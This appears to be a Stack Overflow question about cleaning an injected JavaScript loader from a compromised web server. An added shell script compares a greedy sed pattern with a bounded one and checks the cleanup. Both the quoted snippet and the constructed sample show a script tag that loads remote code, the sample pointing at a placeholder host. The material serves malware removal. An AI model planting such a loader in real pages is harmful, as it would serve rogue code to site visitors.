Verifying regular expression for malware removal
Posted by Legend on Stack Overflow
Published on 2010-05-08T23:12:36Z
Indexed on 2010/05/08 23:18 UTC
Unfortunately, one of my web servers was compromised recently. I have two questions. Is there a way I can scan the downloaded directory for backdoors? Is there anything I can do to ensure that at least known vulnerabilities do not exist anymore?
Secondly, the malware put up the following in all index.* files on my webserver:
<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('type', 'text/javascript');Hva23p3hnyirlpv7.setAttribute('id', 'myscript1');Hva23p3hnyirlpv7.setAttribute('src',.... CODE DELETED FOR SAFETY.... );}} catch(e) {}</script>
Obviously, this snippet seems to download some rogue file onto the user's machine. I downloaded an entire backup of the web server and am currently trying to remove this snippet from all files. For this I am doing:
find ./ -name "index.*" -exec sed -i 's/<script>\/\*GNU GPL\*.*Hva23p3hnyirlpv7.*<\/script>//g' {} \;
I just wanted to verify that this does the trick. I verified it with a few files, but I want to be sure that this doesn't delete some valid code. Can anyone suggest any other modifications?
© Stack Overflow or respective owner
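The risk in the posted sed command is the two greedy `.*` parts: sed has no non-greedy quantifier, so `.*<\/script>` extends to the last `</script>` on the line, and any legitimate script that follows the injected one on the same line is deleted with it. The script below is an added example, not code from the question or its answers. It constructs a sample infected `index.html` (the marker `Hva23p3hnyirlpv7` is the one quoted in the question; the `src` URL `example.invalid` and the `siteReady` script are placeholders), runs the posted pattern and a bounded variant side by side, and shows the list-then-clean-then-re-list check a practitioner would run over a backup tree.

```shell
#!/bin/sh
# Added example, not from the original question: shows why the greedy `.*`
# in the posted sed command can wipe legitimate code, and a bounded
# alternative. The marker Hva23p3hnyirlpv7 is the one quoted in the question;
# the sample HTML and the src URL (example.invalid) are constructed here.
set -eu

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT

# Constructed payload in the shape quoted above (src replaced by a placeholder).
INJECTED="<script>/*GNU GPL*/ try{window.onload = function(){var Hva23p3hnyirlpv7 = document.createElement('script');Hva23p3hnyirlpv7.setAttribute('src', 'http://example.invalid/x.js');}} catch(e) {}</script>"
# A legitimate script the site needs, sitting on the SAME line (common in
# minified or template-generated HTML).
LEGIT="<script>window.siteReady = true;</script>"

# The question's pattern: `.*` runs to the LAST </script> on the line.
GREEDY='s/<script>\/\*GNU GPL\*.*Hva23p3hnyirlpv7.*<\/script>//g'
# Bounded pattern: [^<]* cannot step over a '<', so the match stops at the
# first </script> after the marker. Assumes the payload itself contains no
# literal '<' (true of the snippet quoted in the question); if it did, use
#   perl -pi -e 's{<script>/\*GNU GPL\*/.*?Hva23p3hnyirlpv7.*?</script>}{}g'
BOUNDED='s/<script>\/\*GNU GPL\*\/[^<]*Hva23p3hnyirlpv7[^<]*<\/script>//g'

make_sample() {  # $1 = path; writes an infected index.* file
    printf '<html><body>\n%s%s\n<p>real content</p>\n</body></html>\n' \
        "$INJECTED" "$LEGIT" > "$1"
}

sed_inplace() {  # $1 = sed script, $2 = file; portable in-place edit
    sed "$1" "$2" > "$2.tmp" && mv "$2.tmp" "$2"
}

count_lines_matching() {  # $1 = fixed string, $2 = file; prints 0 if absent
    grep -c -F "$1" "$2" || true
}

# Apply a pattern to a fresh sample and report what survived.
clean_and_report() {  # $1 = sed script, $2 = label
    f="$WORK/$2/index.html"
    mkdir -p "$WORK/$2"
    make_sample "$f"
    sed_inplace "$1" "$f"
    printf 'marker=%s legit=%s' \
        "$(count_lines_matching Hva23p3hnyirlpv7 "$f")" \
        "$(count_lines_matching siteReady "$f")"
}

greedy_result()  { clean_and_report "$GREEDY"  greedy;  }
bounded_result() { clean_and_report "$BOUNDED" bounded; }

# Verification for a real backup: list infected files, clean, re-list.
infected_files() {  # $1 = directory; prints paths still carrying the marker
    grep -rl -F Hva23p3hnyirlpv7 "$1" || true
}

# Dry run on a constructed backup tree.
mkdir -p "$WORK/site/sub"
make_sample "$WORK/site/index.html"
make_sample "$WORK/site/sub/index.php"
echo "infected before: $(infected_files "$WORK/site" | wc -l)"
find "$WORK/site" -name 'index.*' \
    -exec sh -c 'sed "$1" "$2" > "$2.tmp" && mv "$2.tmp" "$2"' _ "$BOUNDED" {} \;
echo "infected after:  $(infected_files "$WORK/site" | wc -l)"
echo "greedy:  $(greedy_result)"    # marker=0 legit=0  (legitimate script lost)
echo "bounded: $(bounded_result)"   # marker=0 legit=1
```

Run `grep -rl` for the marker before and after the `find` pass and diff the two lists; an empty "after" list confirms the marker is gone everywhere, while a `diff` of a few cleaned files against the backup confirms nothing else moved. The bounded pattern only protects against over-matching on one line; if the injected tag were ever split across lines, line-oriented sed would not match it at all and a multi-line tool (perl with `-0`) would be needed.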